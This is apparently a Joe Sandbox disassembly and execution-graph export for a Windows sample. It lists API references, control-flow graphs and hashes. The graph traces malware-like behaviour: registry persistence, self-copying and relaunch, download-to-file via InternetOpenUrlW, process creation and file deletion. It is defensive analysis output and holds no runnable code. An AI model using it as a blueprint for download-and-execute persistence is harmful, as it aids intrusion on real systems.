                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 407 401ad6-401adc 401->407 403->402 408 401af8-401afe GetProcAddress 403->408 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(020A1588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Execution Graph

                          Execution Coverage:2.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:4.8%
                          Total number of Nodes:1144
                          Total number of Limit Nodes:6
                          execution_graph 6125 404ec0 6149 40821c 6125->6149 6127 404edf 6128 404f04 6127->6128 6129 404ef4 6127->6129 6132 404efd 6127->6132 6156 40c519 6128->6156 6152 404e7b 6129->6152 6133 405111 6134 40c5b9 SysFreeString 6133->6134 6134->6132 6137 40c5b9 SysFreeString 6138 405103 6137->6138 6139 40c5b9 SysFreeString 6138->6139 6140 405109 6139->6140 6141 40c5b9 SysFreeString 6140->6141 6141->6133 6142 404f0b 6142->6132 6142->6133 6148 4050f2 6142->6148 6163 40c43d 6142->6163 6147 4050e2 6172 40be3a 6147->6172 6175 40c5b9 6148->6175 6150 408233 PathCombineW 6149->6150 6151 408220 6149->6151 6150->6127 6151->6150 6153 404e93 6152->6153 6178 408248 6153->6178 6192 40c4b4 CoCreateInstance 6156->6192 6159 40c531 VariantInit SysAllocString 6160 40c589 6159->6160 6162 40c551 VariantClear 6159->6162 6160->6142 6162->6160 6194 40bf60 6163->6194 6166 4050ce 6166->6147 6168 40c00b 6166->6168 6167 40be3a HeapFree 6167->6166 6169 40c01a 6168->6169 6171 40c03b 6168->6171 6170 40bde1 3 API calls 6169->6170 6170->6171 6171->6147 6173 40be41 HeapFree 6172->6173 6174 40be53 6172->6174 6173->6174 6174->6148 6176 40c5c0 SysFreeString 6175->6176 6177 4050fb 6175->6177 6176->6177 6177->6137 6179 40821c PathCombineW 6178->6179 6180 408268 6179->6180 6181 408272 FindFirstFileW 6180->6181 6182 404eb9 6180->6182 6181->6182 6189 408292 6181->6189 6182->6132 6183 4082a2 WaitForSingleObject 6184 4083b6 FindClose 6183->6184 6183->6189 6184->6182 6185 40839e FindNextFileW 6185->6184 6185->6189 6186 408306 PathMatchSpecW 6186->6189 6187 40821c PathCombineW 6187->6189 6188 408374 Sleep 6188->6189 6189->6183 6189->6184 6189->6185 6189->6186 6189->6187 6189->6188 6190 40833f Sleep 6189->6190 6191 408248 PathCombineW 6189->6191 6190->6189 6191->6189 6193 40c4dd 6192->6193 6193->6159 6193->6160 6195 40bf72 6194->6195 6196 40bfbf 6195->6196 6198 40bfa7 wvnsprintfW 6195->6198 6199 40bde1 6195->6199 6196->6166 6196->6167 6198->6195 6200 40bdf2 6199->6200 6201 40bde5 6199->6201 6203 40be0c HeapReAlloc 6200->6203 6204 40bdfc HeapAlloc 6200->6204 6202 40be3a HeapFree 6201->6202 6205 40bdec 6202->6205 6203->6205 6204->6205 6205->6195 6836 409402 6837 409415 6836->6837 6838 409419 6837->6838 6839 409437 SysFreeString 6837->6839 6839->6838 6840 409883 6841 409890 6840->6841 6842 409655 __VEC_memcpy 6841->6842 6843 4098ad 6842->6843 6844 409655 __VEC_memcpy 6843->6844 6845 4098c7 6843->6845 6844->6845 6206 409445 6208 40945a 6206->6208 6207 40945e 6208->6207 6209 4094a0 SysFreeString SysFreeString 6208->6209 6209->6207 5721 40b346 5766 40d5b0 5721->5766 5724 40b37e 5757 40b3db 5724->5757 5813 40ac20 RegOpenKeyExW 5724->5813 5728 40b394 GetModuleFileNameW 5821 4069fd RegCreateKeyExW 5728->5821 5733 40b3f2 Sleep 5736 40a786 35 API calls 5733->5736 5734 40b3c5 5825 40a786 5734->5825 5735 40b3ca GetLastError 5735->5734 5738 40b407 GetModuleFileNameW 5736->5738 5740 40ac20 4 API calls 5738->5740 5742 40b3d8 5740->5742 5741 40b45c 5744 40ac20 4 API calls 5741->5744 5746 40b426 CopyFileW 5742->5746 5742->5757 5745 40b468 5744->5745 5747 407727 54 API calls 5745->5747 5748 40b43f 5746->5748 5746->5757 5751 40b474 5747->5751 5752 4077f0 CreateProcessW 5748->5752 5749 40b4b9 ExpandEnvironmentStringsW 5749->5757 5750 40b4cf GetModuleFileNameW 5750->5742 5754 40b498 GetLastError 5751->5754 5755 40b47a 5751->5755 5756 40b44b 5752->5756 5759 40b4a3 5754->5759 5758 4077f0 CreateProcessW 5755->5758 5760 40b44c ExitProcess 5756->5760 5757->5733 5757->5741 5757->5749 5757->5750 5757->5760 5761 40b4fe GetLastError 5757->5761 5768 40b2ce OleInitialize 5757->5768 5777 40aafd 5757->5777 5786 40ab7c GetModuleFileNameW CharLowerW 5757->5786 5791 40abd9 5757->5791 5797 407727 5757->5797 5810 4077f0 5757->5810 5762 40b486 5758->5762 5763 40a786 35 API calls 5759->5763 5764 40a786 35 API calls 5761->5764 5762->5760 5765 40b48b GetLastError 5762->5765 5763->5756 5764->5742 5765->5759 5767 40b353 GetModuleFileNameW 5766->5767 5767->5724 5770 40b2e2 5768->5770 5772 40b325 InternetCloseHandle 5770->5772 5841 407552 5770->5841 5844 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5770->5844 5849 40ac93 5770->5849 5866 40b096 5770->5866 5902 40a6c9 5772->5902 5778 40d5b0 5777->5778 5779 40ab0a GetCommandLineW 5778->5779 5780 40ab1a 5779->5780 5781 40ac20 4 API calls 5780->5781 5784 40ab1f 5780->5784 5782 40ab30 5781->5782 5783 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5782->5783 5782->5784 5785 40ab73 5783->5785 5784->5757 5785->5784 5787 40abb6 5786->5787 5788 40abc0 GetCommandLineW 5787->5788 5789 40abbb 5787->5789 5790 40abd0 5788->5790 5789->5757 5790->5757 5792 40ac20 4 API calls 5791->5792 5793 40abf2 5792->5793 5794 40abf7 FindFirstFileW 5793->5794 5795 40ac1a 5793->5795 5794->5795 5796 40ac0e FindClose 5794->5796 5795->5757 5796->5795 5798 40d5b0 5797->5798 5799 407731 GetModuleFileNameW 5798->5799 5800 407753 5799->5800 5804 40776d 5799->5804 5801 4075d4 15 API calls 5800->5801 5805 407764 5801->5805 5802 407774 ExpandEnvironmentStringsW 6111 4075d4 CreateFileW 5802->6111 5804->5802 5804->5805 5806 4077a7 GetLastError 5804->5806 5807 4077bc GetLastError 5804->5807 5805->5757 5808 4077ca 5806->5808 5807->5808 5808->5804 5809 40a786 35 API calls 5808->5809 5809->5808 6121 40d530 5810->6121 5812 407805 CreateProcessW 5812->5757 5814 40ac60 RegOpenKeyExW 5813->5814 5815 40ac4a 5813->5815 5816 40ac78 5814->5816 5817 40ac7c 5814->5817 6123 4069c0 RegQueryValueExW RegCloseKey 5815->6123 5816->5728 5816->5757 6124 4069c0 RegQueryValueExW RegCloseKey 5817->6124 5820 40ac5a 5820->5814 5820->5816 5822 406a2c 5821->5822 5823 406a30 5821->5823 5822->5734 5822->5735 5824 406a39 RegSetValueExW RegCloseKey 5823->5824 5824->5822 5827 40a79c 5825->5827 5829 40a7b3 5825->5829 5826 406d14 2 API calls 5826->5827 5827->5826 5828 40a79e Sleep 5827->5828 5827->5829 5828->5827 5830 406cb5 GetVersionExW 5829->5830 5831 40a83f 5830->5831 5832 4078cb 12 API calls 5831->5832 5833 40a873 5832->5833 5834 40a718 5 API calls 5833->5834 5836 40a87b 5834->5836 5835 40a744 5 API calls 5835->5836 5836->5835 5837 40a894 Sleep 5836->5837 5838 406e69 22 API calls 5836->5838 5839 40a8c7 Sleep 5836->5839 5840 40a8e1 GetProcessHeap HeapFree 5836->5840 5837->5836 5838->5836 5839->5836 5840->5742 5906 40584d 5841->5906 5843 407557 Sleep 5843->5770 5846 4073dd SystemTimeToFileTime SystemTimeToFileTime 5844->5846 5847 407432 5846->5847 5848 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5847->5848 5848->5770 5907 406d14 InternetAttemptConnect 5849->5907 5851 40aca4 5852 40aca9 Sleep 5851->5852 5853 40acbd 5851->5853 5854 406d14 2 API calls 5852->5854 5910 4078cb 5853->5910 5854->5851 5856 40acd4 5917 406cb5 GetVersionExW 5856->5917 5858 40ad09 5919 40a718 5858->5919 5861 40ad71 Sleep 5863 40ad4c 5861->5863 5863->5861 5864 40ad9f Sleep 5863->5864 5865 40adbc 5863->5865 5923 40a744 5863->5923 5927 406e69 5863->5927 5864->5863 5865->5770 5867 40b0a3 5866->5867 5868 40b0bd 5867->5868 5869 40b0cf 5867->5869 5896 40b0ae 5867->5896 6031 407995 5868->6031 6038 407951 5869->6038 5872 40b0cd 5876 40b0fb GetModuleFileNameW 5872->5876 5888 40b155 5872->5888 5873 40b177 InternetClearAllPerSiteCookieDecisions 5875 40b17d 5873->5875 5874 40b168 InternetSetPerSiteCookieDecisionW 5874->5875 6059 4032b8 5875->6059 5878 40b116 GetCurrentDirectoryW 5876->5878 5884 40b10d 5876->5884 5878->5884 5880 40b186 GetLastError 5882 40a786 35 API calls 5880->5882 5881 40b196 5883 40b1b0 CreateThread 5881->5883 5885 40b1e1 5881->5885 5882->5881 5883->5881 6043 40253c 5884->6043 5887 40b221 5885->5887 5889 40a786 35 API calls 5885->5889 5890 40b228 CloseHandle 5887->5890 5891 40b23d 5887->5891 5888->5873 5888->5874 5888->5896 5892 40b1f7 5889->5892 5890->5890 5890->5891 5893 40a6c9 InternetCloseHandle 5891->5893 5892->5887 5894 40b212 WaitForMultipleObjects 5892->5894 5895 40b242 InternetClearAllPerSiteCookieDecisions 5893->5895 5894->5887 5895->5896 5897 40b24d 5895->5897 5896->5770 5897->5896 5898 40b261 GetModuleFileNameW 5897->5898 5899 40b27c GetCurrentDirectoryW 5898->5899 5900 40b273 5898->5900 5899->5900 5901 40253c 50 API calls 5900->5901 5901->5896 5905 40a6cf 5902->5905 5903 40a6fc InternetCloseHandle 5903->5905 5904 40a716 ExitProcess 5905->5903 5905->5904 5906->5843 5908 406d22 5907->5908 5909 406d26 InternetOpenW 5907->5909 5908->5851 5909->5851 5939 407e2b 5910->5939 5912 4078dd 5913 407900 5912->5913 5945 40782a GetModuleFileNameW CreateFileW 5912->5945 5913->5856 5915 4078ec 5915->5913 5949 407d61 5915->5949 5918 406cf6 5917->5918 5918->5858 5920 40a722 5919->5920 5921 40a739 5920->5921 5961 4079ff 5920->5961 5921->5863 5924 40a75d 5923->5924 5925 4079ff 5 API calls 5924->5925 5926 40a76e 5924->5926 5925->5926 5926->5863 5928 40d5b0 5927->5928 5929 406e76 GetTickCount 5928->5929 5930 406e92 5929->5930 5967 407b4e 5930->5967 5932 406f49 5976 409c99 5932->5976 5936 407017 5936->5863 5937 406ff4 5937->5936 5992 407a3c 5937->5992 5940 407e3d 5939->5940 5941 407e4e SetFilePointer ReadFile 5939->5941 5955 407cd7 5940->5955 5944 407e7e 5941->5944 5943 407e44 5943->5941 5943->5944 5944->5912 5946 407871 GetFileTime CloseHandle 5945->5946 5947 407888 GetTickCount 5945->5947 5948 407893 5946->5948 5947->5948 5948->5915 5950 407d70 5949->5950 5953 407d77 5949->5953 5951 407cd7 3 API calls 5950->5951 5951->5953 5952 407d81 5952->5913 5953->5952 5954 407dfa SetFilePointer WriteFile 5953->5954 5954->5913 5956 40d5b0 5955->5956 5957 407ce4 GetModuleFileNameW 5956->5957 5958 407d00 5957->5958 5959 407d0d GetCurrentDirectoryW 5957->5959 5960 407d36 CreateFileW 5958->5960 5959->5958 5960->5943 5964 407908 5961->5964 5963 407a05 5963->5920 5965 407e2b 5 API calls 5964->5965 5966 407919 5965->5966 5966->5963 6002 407267 5967->6002 5969 407b63 5970 407e2b 5 API calls 5969->5970 5971 407b83 5969->5971 5970->5971 5971->5971 5972 407c6b 5971->5972 6007 40bcb4 5971->6007 6017 40bd55 5972->6017 5977 409ca6 5976->5977 5978 409cbb InternetOpenUrlW 5977->5978 5979 409cdf GetProcessHeap HeapAlloc 5978->5979 5980 406fe2 5978->5980 5979->5980 5981 409d5b InternetReadFile 5979->5981 5980->5936 5988 406e00 5980->5988 5982 409d79 GetProcessHeap HeapAlloc 5981->5982 5984 409d0b 5981->5984 5983 409d92 GetProcessHeap HeapFree 5982->5983 5983->5980 5984->5981 5984->5982 5986 409d1f GetProcessHeap HeapReAlloc 5984->5986 5987 40c5d0 __VEC_memcpy 5984->5987 5986->5980 5986->5984 5987->5984 5989 406e12 5988->5989 5990 40c5d0 __VEC_memcpy 5989->5990 5991 406e21 5990->5991 5991->5937 5993 407a4f 5992->5993 5994 40c5d0 __VEC_memcpy 5993->5994 6001 407b42 5993->6001 5995 407a7d 5994->5995 5996 407267 3 API calls 5995->5996 5995->6001 5997 407b17 5996->5997 5998 407267 3 API calls 5997->5998 5999 407b20 5998->5999 6000 407d61 5 API calls 5999->6000 6000->6001 6001->5936 6003 407284 6002->6003 6004 407278 GetSystemTime 6002->6004 6005 40728b SystemTimeToFileTime SystemTimeToFileTime 6003->6005 6004->6005 6006 4072e8 __aulldiv 6005->6006 6006->5969 6011 40bcd3 6007->6011 6008 40bd17 6009 40bd3a 6008->6009 6012 40b51c __VEC_memcpy 6008->6012 6010 40bd4d 6009->6010 6013 40c5d0 __VEC_memcpy 6009->6013 6010->5972 6011->6008 6023 40c5d0 6011->6023 6012->6008 6013->6010 6018 40bd5c 6017->6018 6018->6018 6019 40bd9e 6018->6019 6020 40bcb4 __VEC_memcpy 6018->6020 6021 40bcb4 __VEC_memcpy 6019->6021 6020->6019 6022 407c7c 6021->6022 6022->5932 6024 40c5e8 6023->6024 6025 40c60f __VEC_memcpy 6024->6025 6026 40bcf9 6024->6026 6025->6026 6026->6010 6027 40b51c 6026->6027 6028 40b543 6027->6028 6030 40b552 6027->6030 6029 40c5d0 __VEC_memcpy 6028->6029 6029->6030 6030->6008 6037 4079a2 6031->6037 6032 4079f1 6033 407951 36 API calls 6032->6033 6035 4079fc 6033->6035 6034 407e2b 5 API calls 6034->6037 6035->5872 6037->6032 6037->6034 6066 40791c 6037->6066 6040 407965 6038->6040 6039 407e2b 5 API calls 6039->6040 6040->6039 6041 40798e 6040->6041 6042 40791c 36 API calls 6040->6042 6041->5872 6042->6040 6045 402549 6043->6045 6044 402572 6046 402584 DeleteFileW 6044->6046 6048 40a786 35 API calls 6044->6048 6045->6044 6047 406d14 2 API calls 6045->6047 6052 402561 Sleep 6045->6052 6049 402594 6046->6049 6053 4025ba 6046->6053 6047->6045 6050 402581 6048->6050 6054 4025c1 6049->6054 6055 4025ad Sleep 6049->6055 6072 407036 DeleteFileW CreateFileW 6049->6072 6050->6046 6052->6045 6053->5888 6056 40a786 35 API calls 6054->6056 6058 4025d0 _memset 6054->6058 6055->6049 6055->6053 6056->6058 6057 402630 CreateProcessW 6057->6053 6058->6057 6083 406a68 RegOpenKeyExW 6059->6083 6064 403351 GetProcAddress GetProcAddress GetProcAddress 6065 403386 6064->6065 6065->5880 6065->5881 6067 407d61 5 API calls 6066->6067 6068 407930 6067->6068 6069 407939 GetLastError 6068->6069 6070 407949 6068->6070 6071 40a786 35 API calls 6069->6071 6070->6037 6071->6070 6073 407078 GetLastError 6072->6073 6078 40706b 6072->6078 6074 407095 InternetOpenUrlW 6073->6074 6075 407089 SetEndOfFile 6073->6075 6076 4070c6 InternetQueryDataAvailable 6074->6076 6077 4070b8 CloseHandle 6074->6077 6075->6074 6079 407119 InternetReadFile 6076->6079 6077->6078 6078->6049 6080 407123 CloseHandle InternetCloseHandle 6079->6080 6081 4070ed 6079->6081 6080->6078 6081->6080 6082 4070f2 WriteFile 6081->6082 6082->6079 6084 406a9a 6083->6084 6088 4032c4 6083->6088 6107 4069c0 RegQueryValueExW RegCloseKey 6084->6107 6086 406aaa 6087 4069fd 3 API calls 6086->6087 6086->6088 6087->6088 6089 406adf 6088->6089 6090 406aec 6089->6090 6091 406b11 RegOpenKeyExW 6090->6091 6092 406b34 6091->6092 6100 4032ce 6 API calls 6091->6100 6108 4069c0 RegQueryValueExW RegCloseKey 6092->6108 6094 406b49 6095 406b78 RegOpenKeyExW 6094->6095 6094->6100 6096 406b96 6095->6096 6097 406ba6 6095->6097 6109 4069c0 RegQueryValueExW RegCloseKey 6096->6109 